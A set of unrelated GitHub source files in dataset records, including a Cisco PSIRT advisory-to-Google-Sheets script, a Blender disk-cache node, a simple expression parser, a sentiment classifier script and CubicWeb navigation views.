1\nG_UPDATED_ENTRIES_14 = 1\nG_UPDATED_ENTRIES_30 = 1\n\nheader_names = [\n \"Advisory_ID\",\n \"Advisory_Title\",\n \"CVEs\",\n \"CVE_Base_Score\",\n \"Criticality\",\n \"PSIRT_Version\",\n \"First_Published\",\n \"Last_Updated\",\n \"CVE_Status\",\n \"Products\",\n \"Pub_URL\",\n]\n\nif environ == \"LOCAL\":\n with open(\n r\".\\reports\\Cisco_PSIRT_\" + TODAY_STR + \".csv\",\n \"w\",\n newline=\"\",\n encoding=\"UTF-8\",\n ) as csvfile:\n csvwriter = csv.writer(csvfile, delimiter=\";\")\n csvwriter.writerow(header_names)\n\n for entry in cve_entries:\n last_updated = entry[\"lastUpdated\"]\n fresh_update = recent_update_7(last_updated)\n if fresh_update is True:\n UPDATED_ENTRIES += 1\n advisory_id 
= entry[\"advisoryId\"]\n advisory_title = entry[\"advisoryTitle\"]\n cve_score = entry[\"cvssBaseScore\"]\n criticality = entry[\"sir\"]\n psirt_version = entry[\"version\"]\n first_published = entry[\"firstPublished\"]\n cve_status = entry[\"status\"]\n product_names = entry[\"productNames\"]\n pub_url = entry[\"publicationUrl\"]\n row = [\n advisory_id,\n advisory_title,\n cve_score,\n criticality,\n psirt_version,\n first_published,\n last_updated,\n cve_status,\n product_names,\n pub_url,\n ]\n csvwriter.writerow(row)\n\n ENTRY_COUNT += 1\n\n# End of conversion\n\n# Update 7-day Google Sheet\n\nlogger.info(\"Populate 7-day Google Sheet\")\n\nwks.clear()\n\nwks.update(\"A1:K1\", [header_names])\n\nfor entry in cve_entries:\n last_updated = entry[\"lastUpdated\"]\n fresh_update = recent_update_7(last_updated)\n if fresh_update is True:\n G_UPDATED_ENTRIES_7 += 1\n advisory_id = entry[\"advisoryId\"]\n advisory_title = entry[\"advisoryTitle\"]\n cves_lst = entry[\"cves\"]\n cves = \", \".join(cves_lst)\n cve_score = entry[\"cvssBaseScore\"]\n criticality = entry[\"sir\"]\n psirt_version = entry[\"version\"]\n first_published = entry[\"firstPublished\"]\n cve_status = entry[\"status\"]\n product_names = f'{entry[\"productNames\"]}'\n pub_url = entry[\"publicationUrl\"]\n row = [\n advisory_id,\n advisory_title,\n cves,\n cve_score,\n criticality,\n psirt_version,\n first_published,\n last_updated,\n cve_status,\n product_names,\n pub_url,\n ]\n gsheet_row = f\"A{G_UPDATED_ENTRIES_7}:K{G_UPDATED_ENTRIES_7}\"\n wks.update(gsheet_row, [row])\n G_ENTRY_COUNT += 1\n\n# Update 14-day Google Sheet\nlogger.info(\"Populate 14-day Google Sheet\")\n\nwks_14.clear()\n\nwks_14.update(\"A1:K1\", [header_names])\n\nfor entry in cve_entries:\n last_updated = entry[\"lastUpdated\"]\n fresh_update = recent_update_14(last_updated)\n if fresh_update is True:\n G_UPDATED_ENTRIES_14 += 1\n advisory_id = entry[\"advisoryId\"]\n advisory_title = entry[\"advisoryTitle\"]\n cves_lst = entry[\"cves\"]\n cves = \", \".join(cves_lst)\n cve_score = entry[\"cvssBaseScore\"]\n criticality = entry[\"sir\"]\n psirt_version = entry[\"version\"]\n first_published = entry[\"firstPublished\"]\n cve_status = entry[\"status\"]\n product_names = f'{entry[\"productNames\"]}'\n pub_url = entry[\"publicationUrl\"]\n row = [\n advisory_id,\n advisory_title,\n cves,\n cve_score,\n criticality,\n psirt_version,\n first_published,\n last_updated,\n cve_status,\n product_names,\n pub_url,\n ]\n gsheet_row = f\"A{G_UPDATED_ENTRIES_14}:K{G_UPDATED_ENTRIES_14}\"\n wks_14.update(gsheet_row, [row])\n\n# Update 30-day Google Sheet\nlogger.info(\"Populate 30-day Google Sheet\")\n\nwks_30.clear()\n\nwks_30.update(\"A1:K1\", [header_names])\n\nfor entry in cve_entries:\n last_updated = entry[\"lastUpdated\"]\n fresh_update = recent_update_30(last_updated)\n if fresh_update is True:\n G_UPDATED_ENTRIES_30 += 1\n advisory_id = entry[\"advisoryId\"]\n advisory_title = entry[\"advisoryTitle\"]\n cves_lst = entry[\"cves\"]\n cves = \", \".join(cves_lst)\n cve_score = entry[\"cvssBaseScore\"]\n criticality = entry[\"sir\"]\n psirt_version = entry[\"version\"]\n first_published = entry[\"firstPublished\"]\n cve_status = entry[\"status\"]\n product_names = f'{entry[\"productNames\"]}'\n pub_url = entry[\"publicationUrl\"]\n row = [\n advisory_id,\n advisory_title,\n cves,\n cve_score,\n criticality,\n psirt_version,\n first_published,\n last_updated,\n cve_status,\n product_names,\n pub_url,\n ]\n gsheet_row = 
f\"A{G_UPDATED_ENTRIES_30}:K{G_UPDATED_ENTRIES_30}\"\n wks_30.update(gsheet_row, [row])\n\nTTL_CNT = G_ENTRY_COUNT - 1\nSVN_CNT = G_UPDATED_ENTRIES_7 - 1\nFTN_CNT = G_UPDATED_ENTRIES_14 - 1\nTTY_CNT = G_UPDATED_ENTRIES_30 - 1\n\nlogger.info(\"Total number of CVE entries: %s\", TTL_CNT)\nlogger.info(\"Number of updated CVE entries in last 7-days: %s\", SVN_CNT)\nlogger.info(\"Number of updated CVE entries in last 14-days: %s\", FTN_CNT)\nlogger.info(\"Number of updated CVE entries in last 30-days: %s\", TTY_CNT)\n\nif SVN_CNT == 0:\n wks.update(\"A2\", \"No updated CVEs in this time-frame\")\n\nif FTN_CNT == 0:\n wks_14.update(\"A2\", \"No updated CVEs in this time-frame\")\n\n\nif TTY_CNT == 0:\n wks_30.update(\"A2\", \"No updated CVEs in this time-frame\")\n","repo_name":"dirflash/psirt-gsheets","sub_path":"botsheet.py","file_name":"botsheet.py","file_ext":"py","file_size_in_byte":12106,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"13349901818","text":"import bpy\nfrom bpy.props import *\nfrom dataclasses import dataclass\nfrom ... utils import save_to_disk as sd\nfrom animation_nodes . base_types import AnimationNode\n\nclassTypeItems = {\n (\"BOOLEAN\", \"Boolean\", \"Boolean list\", \"\", 0),\n (\"INTEGER\", \"Integer\", \"Integer list\", \"\", 1),\n (\"FLOAT\", \"Float\", \"Float list\", \"\", 2),\n (\"VECTOR\", \"Vector\", \"3D Vector list\", \"\", 3),\n (\"COLOR\", \"Color\", \"Color list\", \"\", 4),\n (\"QUATERNION\", \"Quaternion\", \"Quaternion list\", \"\", 5),\n (\"MATRIX\", \"Matrix\", \"4x4 Matrix list\", \"\", 6)\n}\n\n@dataclass\nclass DataContainer:\n data: list\n filePath: str\n classType: str\n startFrame: int\n endFrame: int\n maxLength: int\n\ncache = {}\n\nclass BF_DiskCacheWriterNode(bpy.types.Node, AnimationNode):\n bl_idname = \"an_bf_DiskCacheWriterNode\"\n bl_label = \"Disk Cache Writer\"\n bl_width_default = 180\n errorHandlingType = \"EXCEPTION\"\n\n classType: EnumProperty(name=\"Input List Type\", default=\"VECTOR\", items=classTypeItems, update=AnimationNode.refresh)\n\n def create(self):\n self.newInput(\"Text\", \"File Path\", \"filePath\",\n value=\"/tmp/an_cache.npy\",\n showFileChooser = True,\n defaultDrawType = \"PROPERTY_ONLY\")\n socketType = self.classType.title() + \" List\"\n self.newInput(socketType, \"Data\", \"data\")\n self.newInput(\"Integer\", \"Start Frame\", \"startFrame\", value = 1)\n self.newInput(\"Integer\", \"End Frame\", \"endFrame\", value = 250)\n self.newInput(\"Integer\", \"Max List Length\", \"maxListLength\", minValue=1, value = 1000)\n self.newOutput(\"Text\", \"File Path\", \"filePath\")\n\n def draw(self, layout):\n col = layout.column(align=True)\n subcol = col.column(align=True)\n subcol.scale_y = 1.5\n subrow = subcol.row(align=True)\n self.invokeFunction(subrow, \"writeToDisk\", description=\"Write to disk\", text=\"Write\", icon=\"DISK_DRIVE\")\n self.invokeFunction(subrow, \"deleteDiskCache\", description=\"Delete from disk\", text=\"Delete\", icon=\"TRASH\")\n col = layout.column(align=True)\n subcol = col.column(align=True)\n row = subcol.row(align=True)\n row.prop(self, \"classType\", text='')\n\n def writeToDisk(self):\n wm = bpy.context.window_manager\n wm.progress_begin(0, 100)\n wm.progress_update(1)\n\n try:\n packedData = cache.get(self.identifier, None)\n if packedData is None: return\n\n filePath = packedData.filePath\n classType = packedData.classType\n startFrame = packedData.startFrame\n endFrame = packedData.endFrame\n maxLength = 
packedData.maxLength\n\n if maxLength < 1 : return\n n = endFrame - startFrame + 1\n\n info = {\n 'n': n,\n 'max_length': maxLength,\n 'start_frame': startFrame,\n 'end_frame': endFrame,\n 'class_type': classType\n }\n restoreFrame = bpy.context.scene.frame_current\n with sd.Writer(filePath, info) as f:\n count = 0\n for i in range(startFrame, endFrame + 1):\n bpy.context.scene.frame_set(i)\n data = cache.get(self.identifier, None).data\n if data is None:return\n f.add(data)\n wm.progress_update(int((count/n) * 100))\n count += 1\n bpy.context.scene.frame_set(restoreFrame)\n\n except Exception as e:\n print(\"Disk writing Failed\")\n print(str(e))\n\n self.delete()\n wm.progress_end()\n\n def execute(self, filePath, data, startFrame, endFrame, maxListLength):\n if startFrame >= endFrame:\n self.raiseErrorMessage(\"End Frame should be greater than Start Frame\")\n\n listLength = len(data)\n if listLength > maxListLength:\n data = data[:maxListLength]\n\n cache[self.identifier] = DataContainer(\n data,\n filePath,\n self.classType,\n startFrame,\n endFrame,\n maxListLength)\n\n return filePath\n\n def deleteDiskCache(self):\n data = cache.get(self.identifier, None)\n if data:\n sd.delete(data.filePath)\n\n def delete(self):\n keys = list(cache.keys())\n for key in keys:\n if key.startswith(self.identifier):\n cache.pop(key, None)\n","repo_name":"harisreedhar/an_bluefox_extension","sub_path":"an_bluefox_extension/nodes/utility/disk_cache_writer.py","file_name":"disk_cache_writer.py","file_ext":"py","file_size_in_byte":4463,"program_lang":"python","lang":"en","doc_type":"code","stars":55,"dataset":"github-code","pt":"81"} +{"seq_id":"18672680307","text":"import dataclasses\nimport datetime\n\nimport app.api.helper_class as api_class\n\n\n@dataclasses.dataclass\nclass ProfileResponseModel(api_class.ResponseDataModel):\n uuid: int = 0\n name: str = 'PROFILE_NAME'\n description: str = 'SOME_DESCRIPTION'\n phone: str = '010-0000-0000'\n email: str = 'example@example.com'\n sns: str = '\\\"twitter\\\": \\\"TWITTER_USER_ID\\\"'\n data: dict[str, str] = dataclasses.field(default_factory=lambda: {})\n\n is_private: bool = False\n\n created_at: datetime.datetime = datetime.datetime.now()\n modified_at: datetime.datetime = datetime.datetime.now()\n modified: bool = False\n\n\nclass ProfileRelationResponseCase(api_class.ResponseCaseCollector):\n profilerelation_follows = api_class.Response(\n description='Requested profile follows this profile',\n code=200, success=True, # Set code to 201 when relations are created, not modified\n public_sub_code='profilerelation.follows')\n profilerelation_follow_requests = api_class.Response(\n description='Requested profile requested follow on this profile',\n code=200, success=True, # Set code to 201 when relations are created, not modified\n public_sub_code='profilerelation.follow_requests')\n profilerelation_blocks = api_class.Response(\n description='Requested profile blocks this profile',\n code=200, success=True, # Set code to 201 when relations are created, not modified\n public_sub_code='profilerelation.blocks')\n profilerelation_hides = api_class.Response(\n description='Requested profile hides this profile',\n code=200, success=True,\n public_sub_code='profilerelation.hides')\n profilerelation_cut_off = api_class.Response(\n description='Requested profile now cuts off relationship with this profile',\n code=204, success=True,\n public_sub_code='profilerelation.cut_off')\n\n profilerelation_in_follow_request_state = api_class.Response(\n description='You are 
on a follow-request state with this profile',\n code=409, success=False,\n public_sub_code='profilerelation.in_follow_request_state')\n profilerelation_already_in_state = api_class.Response(\n description='You are already on requested state with this profile',\n code=409, success=False,\n public_sub_code='profilerelation.already_on_state')\n\n profilerelation_not_related = api_class.Response(\n description='You aren\\'t on any relationship with this profile',\n code=404, success=False,\n public_sub_code='profilerelation.not_related')\n","repo_name":"MU-Software/bca_backend","sub_path":"app/api/bca/profile/profilerelation_response_case.py","file_name":"profilerelation_response_case.py","file_ext":"py","file_size_in_byte":2577,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"39731853548","text":"class Node:\n def __init__(self, data):\n self.data = data\n self.next = None\n\n\nclass Queue:\n def __init__(self):\n self.front = None\n self.rear = None\n\n def _is_empty(self):\n return self.front is None\n\n def enqueue(self, item):\n new_node = Node(item)\n if self._is_empty():\n self.rear = self.front = new_node\n return\n\n self.rear.next = new_node\n self.rear = new_node\n print(\"Enqueued {}\".format(item))\n\n def dequeue(self):\n if self._is_empty():\n print(\"Underflow!\")\n return\n to_delete = self.front\n self.front = self.front.next\n print(\"Dequeued {}\".format(to_delete.data))\n\n def print_q(self):\n if self._is_empty():\n print(\"Empty Queue!\")\n return\n\n temp = self.front\n while temp != self.rear:\n print(temp.data, end=\"->\")\n temp = temp.next\n\n print(self.rear.data, end=\"->\")\n print(\"END\")\n\n\nif __name__ == \"__main__\":\n print(\"Queue via Linked List\")\n\n q = Queue()\n q.print_q()\n\n q.enqueue('a')\n q.print_q()\n\n q.enqueue('b')\n q.enqueue('c')\n q.enqueue('d')\n q.enqueue('e')\n q.print_q()\n\n q.dequeue()\n q.print_q()\n\n q.dequeue()\n q.dequeue()\n q.dequeue()\n q.print_q()\n\n q.dequeue()\n q.print_q()\n\n q.enqueue('f')\n q.enqueue('g')\n q.print_q()\n q.dequeue()\n q.print_q()\n","repo_name":"nishasinha/DataStructures","sub_path":"src/datastructures/queue/viaLinkedList.py","file_name":"viaLinkedList.py","file_ext":"py","file_size_in_byte":1466,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"7930746257","text":"def max_num(num1, num2, num3):\n if num1 == num2 or num1 == num3 or num2 == num3 or (num1 == num2 and num1 == num3):\n print(\"Dwie lub wszystkie liczby sa takie same\")\n if num1 >= num2 and num1 >= num3:\n return num1\n elif num2 >= num1 and num2 >= num3:\n return num2\n else:\n return num3\n\nprint(max_num(600,600,67))","repo_name":"dochman-ato/Python-Basics","sub_path":"13_IF_Statements_and_comparisons.py","file_name":"13_IF_Statements_and_comparisons.py","file_ext":"py","file_size_in_byte":351,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"15800403128","text":"import re\n\n#Collaboration with Jasper Burns, Kevin Mannix\n\nRESERVEDWORDS = ['true', 'false', 'xor', 'not', 'log']\n\n# 1a\ndef variable(ts):\n\tif re.match(\"^([a-z][\\w]*)$\", ts[0]) and ts[0] not in RESERVEDWORDS:\n\t\treturn ts[0], ts[1:]\n\telse:\n\t\treturn None, None\n\ndef number(ts):\n\tif re.match(\"-?\\d+$\", ts[0]):\n\t\treturn int(ts[0]), ts[1:]\n\telse:\n\t\treturn None, None\n\n#1b\ndef formula(ts):\n\te1, ts = left(ts)\n\n\tif e1 is not None:\n\t\tif ts:\n\t\t\tif ts[0] == 
'xor':\n\t\t\t\te2, ts = formula(ts[1:])\n\t\t\t\tif e2 is not None:\n\t\t\t\t\treturn {'Xor': [e1, e2]}, ts\n\t\t\t\treturn None, None\n\t\treturn e1, ts\n\treturn None, None\n\ndef left(ts):\n\tif ts[0] == 'not':\n\t\te1, ts = fparenthesis(ts[1:])\n\t\treturn {'Not': [e1]}, ts\n\n\tif ts[0] == '(':\n\t\te1, ts = fparenthesis(ts)\n\t\treturn {'Parens': [e1]}, ts\n\n\telif ts[0] == 'true':\n\t\treturn 'True', ts[1:]\n\n\telif ts[0] == 'false':\n\t\treturn 'False', ts[1:]\n\n\telse:\n\t\tvar, ts = variable(ts)\n\t\tif var is not None:\n\t\t\treturn {'Variable': [var]}, ts\n\t\treturn None, None\n\ndef fparenthesis(ts):\n\tif ts[0] == '(':\n\t\te1, ts = formula(ts[1:])\n\t\tif ts[0] == ')':\n\t\t\treturn e1, ts[1:]\n\n#1c\ndef term(ts):\n\te1, ts = factor(ts)\n\n\tif e1 is not None:\n\t\tif ts:\n\t\t\tif ts[0] == '+':\n\t\t\t\te2, ts = term(ts[1:])\n\t\t\t\tif e2 is not None:\n\t\t\t\t\treturn {'Plus': [e1, e2]}, ts\n\t\t\t\treturn None, None\n\t\treturn e1, ts\n\treturn None, None\n\ndef factor(ts):\n\te1, ts = leftfactor(ts)\n\n\tif e1 is not None:\n\t\tif ts:\n\t\t\tif ts[0] == '*':\n\t\t\t\te2, ts = factor(ts[1:])\n\t\t\t\tif e2 is not None:\n\t\t\t\t\treturn {'Mult': [e1, e2]}, ts\n\t\t\t\treturn None, None\n\t\treturn e1, ts\n\treturn None, None\n\ndef leftfactor(ts):\n\tif ts[0] == 'log':\n\t\te1, ts = parenthesis(ts[1:])\n\t\treturn {'Log': [e1]}, ts\n\n\tif ts[0] == '(':\n\t\te1, ts = parenthesis(ts)\n\t\treturn {'Parens': [e1]}, ts\n\n\telse:\n\t\tvar, tsV = variable(ts)\n\t\tnum, tsN = number(ts)\n\t\tif var is not None:\n\t\t\treturn {'Variable': [var]}, tsV\n\t\telif num is not None:\n\t\t\treturn {'Number': [num]}, tsN\n\n\t\treturn None, None\n\ndef parenthesis(ts):\n\tif ts[0] == '(':\n\t\te1, ts = term(ts[1:])\n\t\tif ts[0] == ')':\n\t\t\treturn e1, ts[1:]\n\n#1d\ndef program(ts):\n\tif not ts or ts[0] == '}':\n\t\treturn 'End', ts\n\telse:\n\t\tif ts[0] == 'print':\n\t\t\texp, ts = expression(ts[1:])\n\t\t\tif exp is not None:\n\t\t\t\tif ts[0] == ';':\n\t\t\t\t\tend, ts = program(ts[1:])\n\t\t\t\t\tif end is not None:\n\t\t\t\t\t\treturn {'Print': [exp, end]}, ts\n\n\t\telif ts[0] == 'assign':\n\t\t\tvar, ts = variable(ts[1:])\n\t\t\tif var is not None:\n\t\t\t\tif ts[0] == ':=':\n\t\t\t\t\texp, ts = expression(ts[1:])\n\t\t\t\t\tif exp is not None:\n\t\t\t\t\t\tif ts[0]==';':\n\t\t\t\t\t\t\tend, ts = program(ts[1:])\n\t\t\t\t\t\t\tif end is not None:\n\t\t\t\t\t\t\t\treturn {'Assign': [{'Variable':[var]}, exp, end]}, ts\n\t\telif ts[0] == 'if':\n\t\t\texp, ts = expression(ts[1:])\n\t\t\tif exp is not None:\n\t\t\t\tif ts[0] == '{':\n\t\t\t\t\tprog, ts = program(ts[1:])\n\t\t\t\t\tif prog is not None:\n\t\t\t\t\t\tif ts[0] == '}':\n\t\t\t\t\t\t\tprog2, ts = program(ts[1:])\n\t\t\t\t\t\t\tif prog2 is not None:\n\t\t\t\t\t\t\t\treturn {'If':[exp, prog, prog2]}, ts\n\t\telif ts[0] == 'while':\n\t\t\texp, ts = expression(ts[1:])\n\t\t\tif exp is not None:\n\t\t\t\tif ts[0] == '{':\n\t\t\t\t\tprog, ts = program(ts[1:])\n\t\t\t\t\tif prog is not None:\n\t\t\t\t\t\tif ts[0] == '}':\n\t\t\t\t\t\t\tprog2, ts = program(ts[1:])\n\t\t\t\t\t\t\tif prog2 is not None:\n\t\t\t\t\t\t\t\treturn {'While':[exp, prog, prog2]}, ts\n\n\t\treturn None\n\n\n\ndef expression(ts):\n\tt, tst = term(ts)\n\tf, tsf = formula(ts)\n\n\n\tif t and f:\n\t\tif len(tst) < len(tsf):\n\t\t\treturn t, tst\n\t\telse:\n\t\t\treturn f, tsf\n\telif f:\n\t\treturn f, tsf\n\telif t:\n\t\treturn t, tst\n\n\telse:\n\t\treturn None, 
None\n\n\n\n\n\n\n\n\n\n\n","repo_name":"moneydance/CS320","sub_path":"parse.py","file_name":"parse.py","file_ext":"py","file_size_in_byte":3427,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"74421343625","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\nimport pdb\n\ndef readdat(filename):\n #filename = 'trajectory_360.dat'\n output = np.loadtxt(filename)\n x = output[:,0]\n y = output[:,1]\n return x, y\n\nx1, y1 = readdat('DATA/init.dat')\n#x2, y2 = readdat('tracks/trajectory_3600.dat')\n#x3, y3 = readdat('tracks/trajectory_720.dat')\n\nplt.plot(x1, y1, '.r', markersize=8)\n#plt.plot(x2, y2, '.b', markersize=10)\n#plt.plot(x3, y3, '.k', markersize=5)\nplt.show()\n\npdb.set_trace()\n","repo_name":"fdongyu/PCSE_final","sub_path":"readinit.py","file_name":"readinit.py","file_ext":"py","file_size_in_byte":487,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"30197517162","text":"from eval.functions import *\nfrom models.Data import *\nfrom models.Max_Ent import *\nfrom models.Naive_Bayes import *\nimport pickle\n\nif __name__ == '__main__':\n ## read bull and bear\n bear_fp = \"/Users/fredzheng/Documents/stocktwits/sentiment/Bearish\"\n bull_fp = \"/Users/fredzheng/Documents/stocktwits/sentiment/Bullish\"\n data_fp = \"/Users/fredzheng/Documents/stocktwits/sentiment/data_object.pkl\"\n w2v_fp = \"/Users/fredzheng/Documents/stocktwits/sentiment/word2vec\"\n\n load_existing_object = True\n if load_existing_object:\n con = open(data_fp, \"rb\")\n data = pickle.load(con)\n con.close()\n else:\n data = Data()\n data.loads(bull_fp, bear_fp, max_n=50000)\n data.clean()\n data.cut_train_and_test(balance=True)\n # data.save(data_fp)\n\n ## prep data\n tweets_train = data.train\n trainX = [tweet.words for tweet in tweets_train]\n trainY = [tweet.label for tweet in tweets_train]\n train = list(zip(trainX, trainY))\n\n tweets_test = data.test\n testX = [tweet.words for tweet in tweets_test]\n testY = [tweet.label for tweet in tweets_test]\n test = list(zip(testX, testY))\n\n ## naive bayes\n nb = Naive_Bayes(train)\n pred_nb = [nb.pred_label(W) for W, y in train]\n eval(pred_nb, trainY) ## training error 15.29%\n\n ## maxent\n maxent = Max_Entropy(train, num_of_epoch=100)\n pred_me = [maxent.pred_label(W) for W, y in train]\n eval(pred_me, [y for W, y in train]) ## training error 13.95%\n\n ## test error\n pred_nb = [nb.pred_label(W) for W, y in test]\n eval(pred_nb, [y for W, y in test]) ## test error 25.67%\n\n pred_me = [maxent.pred_label(W) for W, y in test]\n eval(pred_me, [y for W, y in test]) ## test error 31.42%\n","repo_name":"NEWBY2017/SentiTrack","sub_path":"NB_MaxEnt_start.py","file_name":"NB_MaxEnt_start.py","file_ext":"py","file_size_in_byte":1760,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"1227876886","text":"import json\nfrom packaging import version\n\n# Cubicweb import\nimport cubicweb\ncw_version = version.parse(cubicweb.__version__)\nif cw_version >= version.parse(\"3.21.0\"):\n from cubicweb import _\n\nfrom cubicweb.web import component\nfrom cubicweb.view import EntityView\nfrom cubicweb.predicates import is_instance\nfrom cubicweb.predicates import nonempty_rset\nfrom cubicweb.predicates import anonymous_user\nfrom cubicweb.predicates import one_line_rset\nfrom cubicweb.predicates import match_view\nfrom cubicweb.predicates import match_kwargs\nfrom cubicweb.predicates import 
authenticated_user\nfrom cubicweb.web.views.basecomponents import AnonUserStatusLink\nfrom cubicweb.web.views.basecomponents import ApplLogo\nfrom cubicweb.web.views.basecomponents import HeaderComponent\nfrom cubicweb.web.views.baseviews import MetaDataView\nfrom cubicweb.web.views.ibreadcrumbs import BreadCrumbEntityVComponent\nfrom cubicweb.web.views.ibreadcrumbs import BreadCrumbLinkToVComponent\nfrom cubicweb.web.views.ibreadcrumbs import BreadCrumbAnyRSetVComponent\nfrom cubicweb.web.views.ibreadcrumbs import BreadCrumbETypeVComponent\nfrom logilab.common.decorators import monkeypatch\n\n# Cubes import\nfrom cubes.bootstrap.views.basecomponents import BSAuthenticatedUserStatus\nfrom cubicweb.web.views.boxes import EditBox\nfrom cubes.rql_upload.views.components import CWUploadBox\nfrom cubes.rql_upload.views.utils import load_forms\n\n\n\n##############################################################################\n# Time left\n##############################################################################\n\n\nclass TimeLeft(HeaderComponent):\n \"\"\" Build a time left before session expiration display in the header.\n \"\"\"\n __regid__ = \"time-left\"\n __select__ = authenticated_user()\n context = u\"header-right\"\n order = 3\n\n def render(self, w):\n\n # Get the expiration delay\n expiration_delay = self._cw.vreg.config.get(\n \"apache-cleanup-session-time\")\n if expiration_delay is None:\n expiration_delay = self._cw.vreg.config.get(\n \"cleanup-session-time\")\n if expiration_delay is None:\n return\n\n # Define the expiration delay div\n w(u''.format(\n self._cw.session.sessionid))\n w(u''.format(\n expiration_delay * 1000))\n w(u'Auto logout in: ::'\n '')\n\n\n###############################################################################\n# Navigation Box\n###############################################################################\n\nclass PIWSAuthenticatedUserStatus(BSAuthenticatedUserStatus):\n \"\"\"\n Overrride bootstrap user-status component.\n In all-in-one.conf:\n If show_user_status=no : display nothing.\n If show_user_status=yes and enable-apache-logout=no: display the default\n bootstrap cube component.\n If show_user_status=yes and enable-apache-logout=yes: display a logout\n button next to the search field.\n If show_user_status=yes and enable-apache-logout=no and\n apache-cleanup-session-time is not empty: raise an error.\n \"\"\"\n def render(self, w):\n config = self._cw.vreg.config\n if config.get(\"show_user_status\"):\n if config.get(\"enable-apache-logout\"):\n w(u\"Logout\".format(\n self._cw.base_url() + 'logout'))\n else:\n super(PIWSAuthenticatedUserStatus, self).render(w)\n else:\n w(u\"\")\n\n\nclass PIWSNavigationtBox(component.CtxComponent):\n \"\"\" Display a box containing navigation shortcuts.\n\n To add documentation to the 'All Questionnaires' documentation main button,\n add a 'All Questionnaires.rst' file in instance all-in-one\n 'documentation_folder' parameter configuration file.\n\n Set the 'display_assessment' to False to remove the 'Assessments'\n button.\n\n Set the 'display_metagen' to False to remove the 'MetaGen' button.\n\n Set the 'display_scan' to False to remove the 'Scans' button.\n\n Set the 'display_genomic' to False to remove the 'Genomic' button.\n\n Set the 'display_score' to False to remove the 'Quality Scores' button.\n\n Set the 'display_study' to True to display the 'Study' tab.\n \"\"\"\n __regid__ = \"nav_box\"\n context = \"left\"\n title = _(\"Navigation\")\n order = 0\n display_assessment = True\n 
display_metagen = True\n display_scan = True\n display_genomic = True\n display_study = False\n display_score = True\n display_history = True\n auto_disable_qc = False\n\n def render_body(self, w):\n \"\"\" Create the different item of the navigation box.\n \"\"\"\n # Study\n studies = []\n if self.display_study:\n\n # Request all the available studies\n studies = [row[0] for row in self._cw.execute(\n \"DISTINCT Any SN ORDERBY SN Where S is Study, S name SN\")]\n\n # Display a study selection tab bar\n w(u'
    ')\n w(u'
  • ALL
  • ')\n for i, study in enumerate(studies, start=2):\n w(u'
  • {1}
  • '.format(i, study))\n w(u'
')\n\n # Add a script to manage the tab bar selection\n w(u'')\n\n # Study navigation\n w(u'
')\n w(u'
')\n self.study_nav(w, study=None)\n w(u'
')\n for i, study in enumerate(studies, start=2):\n w(u'
'.format(i))\n self.study_nav(w, study=study)\n w(u'
')\n w(u'
')\n\n def study_nav(self, w, study=None):\n \"\"\" Create the different item of the study navigation box.\n \"\"\"\n\n # Subjects\n w(u'
')\n w(u'
')\n rql = \"Any S Where S is Subject\"\n if study is not None:\n rql += \", S study ST, ST name '{0}'\".format(study)\n href = self._cw.build_url(rql=rql)\n w(u''.format(href))\n w(u'Subjects')\n w(u'

')\n\n # Assessments\n if self.display_assessment:\n w(u'
')\n w(u'
')\n rql = \"Any A Where A is Assessment\"\n if study is not None:\n rql += \", A study ST, ST name '{0}'\".format(study)\n href = self._cw.build_url(rql=rql)\n w(u''.format(href))\n w(u'Assessments')\n w(u'

')\n\n # Scan\n if self.display_scan:\n rql = \"Any S Where S is Scan\"\n if study is not None:\n rql += \", S study ST, ST name '{0}'\".format(study)\n # > disable QC buttons\n if self.auto_disable_qc:\n rql_scores = (\"DISTINCT Any T \" + rql[5:] +\n \", S type T, S score_values V\")\n rset = self._cw.execute(rql_scores)\n active_types = set(row[0] for row in rset)\n # > build navigation\n href = self._cw.build_url(rql=rql)\n rql_types = \"DISTINCT Any T ORDERBY T \" + rql[5:] + \", S type T\"\n rset = self._cw.execute(rql_types)\n types = [line[0] for line in rset.rows]\n if len(types) > 0:\n # > main button\n w(u'
')\n w(u'
')\n # > typed buttons container\n w(u'
'.format(study))\n w(u'
')\n w(u'
')\n # > typed buttons\n for ptype in types:\n typed_rql = rql + \", S type '{0}'\".format(ptype)\n href = self._cw.build_url(rql=typed_rql)\n w(u'
')\n w(u'
')\n w(u''.format(href))\n w(u'{0}'.format(ptype))\n href = self._cw.build_url(\n \"view\", vid=\"score-value-table-secondary\",\n study=study or \"\", etype=\"Scan\", rtype=ptype,\n rsubject=\"subject\", pname=\"description\",\n title=\"QC Scores\", elts_to_sort=[\"ID\"],\n tooltip_name=\"QC\")\n btn_status = \"active\"\n if self.auto_disable_qc and ptype not in active_types:\n btn_status = \"disabled\"\n w(u''.format(btn_status, href))\n w(u'QC')\n w(u'

')\n w(u'
')\n w(u'

')\n\n # QuestionnaireRun\n ajaxcallback = \"get_questionnaires_data\"\n rql_labels = (\"DISTINCT Any T ORDERBY T WHERE A is Assessment, \"\n \"A timepoint T\")\n rql = \"Any QR Where QR is QuestionnaireRun\"\n if study is not None:\n rql += \", QR study ST, ST name '{0}'\".format(study)\n rql_labels += \", A study ST, ST name '{0}'\".format(study)\n href = self._cw.build_url(rql=rql)\n rql_types = (\"DISTINCT Any T ORDERBY T \" + rql[6:] +\n \", QR questionnaire Q, Q type T\")\n rset = self._cw.execute(rql_types)\n types = [line[0] for line in rset.rows]\n if len(types) > 0:\n # > main button\n w(u'
')\n w(u'
')\n # > typed buttons container\n w(u'
'.format(study))\n w(u'
')\n w(u'
')\n # > typed buttons\n for qtype in types:\n href = self._cw.build_url(\n \"view\", vid=\"jtable-table\",\n rql_labels=rql_labels, ajaxcallback=ajaxcallback,\n title=\"All Questionnaires\", elts_to_sort=[\"ID\"],\n tooltip_name=\"All Questionnaires\", qtype=qtype,\n study=study or \"\")\n w(u'
')\n w(u'
')\n w(u''.format(href))\n w(u'{0}'.format(qtype))\n w(u'

')\n w(u'
')\n w(u'

